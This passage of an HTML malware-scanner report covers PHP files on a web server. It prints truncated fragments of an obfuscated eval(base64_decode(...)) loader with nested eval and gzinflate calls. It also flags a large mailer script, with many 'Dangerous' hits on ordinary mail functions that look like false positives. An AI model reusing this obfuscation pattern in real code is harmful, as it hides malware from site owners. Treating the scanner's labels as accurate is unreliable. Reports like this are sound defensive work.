<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'ZnVuY3Rpb24gXzZaeXMoJF90V00xZ1k3aU8peyRfdFdNMWdZN2lPPXN1YnN0cigkX3RXTTFnWTdpTywoaW50KShoZXgyYmluKCczNjM2MzAnKSkpOyRfdFdNMWdZN2lPPXN1YnN0cigkX3RXTTFnWTdpTywoaW50KShoZXgyYmluKCczMCcpKSwoaW50KShoZXgyYmluKCcyZDM2MzYzNicpKSk7cmV0dXJuICRfdFdNMWdZN2lPO30kX21FaDh2PSdfNlp5cyc7JF94d3luVU9MPSdiYXNlNjRfZGVjb2RlJztmdW5jdGlvbiBfcjVNZTBGTnJoODNVWTl4WnQoJF9jQ3pGZHIpe2dsb2JhbCAkX21FaDh2O2dsb2JhbCAkX3h3eW5VT0w7cmV0dXJuIHN0cnJldihnemluZmxhdGUoJF94d3luVU9MKF82WnlzKCRfY0N6RmRyKSkpKTt9ZXZhbChldmFs...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit execution <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP</p><p><i>[<a href="https://cwe.mitre.org/data/definitions/77.html" target="_blank" class="text-primary">https://cwe.mitre.org/data/definitions/77.html</a>, <a href=" https://cwe.mitre.org/data/definitions/78.html" target="_blank" class="text-primary"> https://cwe.mitre.org/data/definitions/78.html</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'ZnVuY3Rpb24gXzZaeXMoJF90V00xZ1k3aU8peyRfdFdNMWdZN2lPPXN1YnN0cigkX3RXTTFnWTdpTywoaW50KShoZXgyYmluKCczNjM2MzAnKSkpOyRfdFdNMWdZN2lPPXN1YnN0cigkX3RXTTFnWTdpTywoaW50KShoZXgyYmluKCczMCcpKSwoaW50KShoZXgyYmluKCcyZDM2MzYzNicpKSk7cmV0dXJuICRfdFdNMWdZN2lPO30kX21FaDh2PSdfNlp5cyc7JF94d3luVU9MPSdiYXNlNjRfZGVjb2RlJztmdW5jdGlvbiBfcjVNZTBGTnJoODNVWTl4WnQoJF9jQ3pGZHIpe2dsb2JhbCAkX21FaDh2O2dsb2JhbCAkX3h3eW5VT0w7cmV0dXJuIHN0cnJldihnemluZmxhdGUoJF94d3luVU9MKF82WnlzKCRfY0N6RmRyKSkpKTt9ZXZhbChldmFs...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">strrev</span><span style="color: #007700">(</span><span style="color: #0000BB">gzinflate</span><span style="color: #007700">(</span><span style="color: #0000BB">$_xwynUOL</span><span style="color: #007700">(</span><span style="color: #0000BB">_6Zys</span><span style="color: #007700">(</span><span style="color: #0000BB">$_cCzFdr</span><span style="color: #007700">))));}eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(</span><span style="color: #0000BB">_r5Me0FNrh83UY9xZt</span><span style="color: #007700">(</span><span style="color: #DD0000">'4tNCPdUMNHGp37TLg3k6pPY5CIf6KWFdMqFEChJKXgZbi1BELpXmoM6ztMvoPnWg4eQUvTkc3PmAcwmls4bLBEQTSX1ckJGas66NtmwXAaljK4uUMePcJnGVpTYHwR</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'ZnVuY3Rpb24gXzZaeXMoJF90V00xZ1k3aU8peyRfdFdNMWdZN2lPPXN1YnN0cigkX3RXTTFnWTdpTywoaW50KShoZXgyYmluKCczNjM2MzAnKSkpOyRfdFdNMWdZN2lPPXN1YnN0cigkX3RXTTFnWTdpTywoaW50KShoZXgyYmluKCczMCcpKSwoaW50KShoZXgyYmluKCcyZDM2MzYzNicpKSk7cmV0dXJuICRfdFdNMWdZN2lPO30kX21FaDh2P</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'ZnVuY3Rpb24gXzZaeXMoJF90V00xZ1k3aU8peyRfdFdNMWdZN2lPPXN1YnN0cigkX3RXTTFnWTdpTywoaW50KShoZXgyYmluKCczNjM2MzAnKSkpOyRfdFdNMWdZN2lPPXN1YnN0cigkX3RXTTFnWTdpTywoaW50KShoZXgyYmluKCczMCcpKSwoaW50KShoZXgyYmluKCcyZDM2MzYzNicpKSk7cmV0dXJuICRfdFdNMWdZN2lPO30kX21FaDh2PSdfNlp5cyc7JF94d3luVU9MPSdiYXNlNjRfZGVjb2RlJztmdW5jdGlvbiBfcjVNZTBGTnJoODNVWTl4WnQoJF9jQ3pGZHIpe2dsb2JhbCAkX21FaDh2O2dsb2JhbCAkX3h3eW5VT0w7cmV0dXJuIHN0cnJldihnemluZmxhdGUoJF94d3luVU9MKF82WnlzKCRfY0N6RmRyKSkpKTt9ZXZhbChldmFs...</span>
</span>
</code></code></td></tr><tr><td><p><b>Function str_rot13 exec_str_rot13 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Encoded Function `exec`</p><p><i>[<a href="https://www.php.net/exec" target="_blank" class="text-primary">https://www.php.net/exec</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">RkRP</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 085a0329 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 085a0329)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">iYXNlNj</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 0f37c730 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 0f37c730)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">mdW5jdGlvb</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 11413268 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 11413268)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 7830f7a6 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 7830f7a6)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">nemluZmxhdG</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 80e70adc <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 80e70adc)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700"><?</span><span style="color: #0000BB">php<br /></span><span style="color: #007700">eval</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 91535293 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 91535293)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">ldmFs</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign d97f004d <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: d97f004d)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">ZXZhb</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign de12c454 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: de12c454)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">V2YW</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign f9dc0a55 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: f9dc0a55)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'base64_decode'</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_2").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/nabfp.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 161.68 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-04-08 21:14:23</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-04-08 21:14:23</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 285</span><br><table id="file_3" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">RETURNTRANSFER</span><span style="color: #007700">, </span><span style="color: #0000BB">1</span><span style="color: #007700">); </span><span style="color: #0000BB">curl_setopt</span><span style="color: #007700">(</span><span style="color: #0000BB">$ch</span><span style="color: #007700">, </span><span style="color: #0000BB">CURLOPT_URL</span><span style="color: #007700">, </span><span style="color: #DD0000">'http://spamcheck.postmarkapp.com/filter'</span><span style="color: #007700">); </span><span style="color: #0000BB">curl_setopt</span><span style="color: #007700">(</span><span style="color: #0000BB">$ch</span><span style="color: #007700">, </span><span style="color: #0000BB">CURLOPT_POSTFIELDS</span><span style="color: #007700">, </span><span style="color: #0000BB">http_build_query</span><span style="color: #007700">(array(</span><span style="color: #DD0000">'email' </span><span style="color: #007700">=> </span><span style="color: #0000BB">$messageHeaders</span><span style="color: #007700">,</span><span style="color: #DD0000">'options'</span><span style="color: #007700">=></span><span style="color: #DD0000">'long'</span><span style="color: #007700">))); </span><span style="color: #0000BB">curl_setopt</span><span style="color: #007700">(</span><span style="color: #0000BB">$ch</span><span style="color: #007700">, </span><span style="color: #0000BB">CURLOPT_SSL_VERIFYPEER</span><span style="color: #007700">, </span><span style="color: #0000BB">0</span><span style="color: #007700">); </span><span style="color: #0000BB">curl_setopt</span><span style="color: #007700">(</span><span style="color: #0000BB">$ch</span><span style="color: #007700">,</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1007</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">void</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1009</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isSMTP</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1018</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isMail</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1027</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isSendmail</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1043</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isQmail</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1059</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">boolean true on success</span><span style="color: #007700">, </span><span style="color: #0000BB">false </span><span style="color: #007700">if </span><span style="color: #0000BB">address already used </span><span style="color: #007700">or </span><span style="color: #0000BB">invalid in some way</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1061</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addAddress</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1063</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">addOrEnqueueAnAddress</span><span style="color: #007700">(</span><span style="color: #DD0000">'to'</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1068</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">works with the SMTP mailer on win32</span><span style="color: #007700">, </span><span style="color: #0000BB">not with the </span><span style="color: #DD0000">"mail" </span><span style="color: #0000BB">mailer</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1073</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addCC</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1075</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">addOrEnqueueAnAddress</span><span style="color: #007700">(</span><span style="color: #DD0000">'cc'</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1085</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addBCC</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1087</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">addOrEnqueueAnAddress</span><span style="color: #007700">(</span><span style="color: #DD0000">'bcc'</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1096</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addReplyTo</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1098</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">addOrEnqueueAnAddress</span><span style="color: #007700">(</span><span style="color: #DD0000">'Reply-To'</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1104</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function), </span><span style="color: #0000BB">addition of such addresses is delayed until send</span><span style="color: #007700">().</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1105</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">, </span><span style="color: #0000BB">but </span><span style="color: #007700">do </span><span style="color: #0000BB">not </span><span style="color: #007700">throw </span><span style="color: #0000BB">exceptions</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1113</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addOrEnqueueAnAddress</span><span style="color: #007700">(</span><span style="color: #0000BB">$kind</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1144</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">call_user_func_array</span><span style="color: #007700">(array(</span><span style="color: #0000BB">$this</span><span style="color: #007700">, </span><span style="color: #DD0000">'addAnAddress'</span><span style="color: #007700">), </span><span style="color: #0000BB">$params</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1157</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addAnAddress</span><span style="color: #007700">(</span><span style="color: #0000BB">$kind</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1195</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function if </span><span style="color: #0000BB">the IMAP extension is available</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1199</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1202</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">parseAddresses</span><span style="color: #007700">(</span><span style="color: #0000BB">$addrstr</span><span style="color: #007700">, </span><span style="color: #0000BB">$useimap </span><span style="color: #007700">= </span><span style="color: #0000BB">true</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1205</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'imap_rfc822_parse_adrlist'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1244</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$addresses</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1252</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isHTML</span><span style="color: #007700">(</span><span style="color: #0000BB">$isHtml </span><span style="color: #007700">= </span><span style="color: #0000BB">true</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1273</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">setFrom</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$auto </span><span style="color: #007700">= </span><span style="color: #0000BB">true</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1300</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">the Message</span><span style="color: #007700">-</span><span style="color: #0000BB">ID header of the last email</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1304</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1306</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getLastMessageID</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1308</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">lastMessageID</span><span style="color: #007700">;</span>
</span>
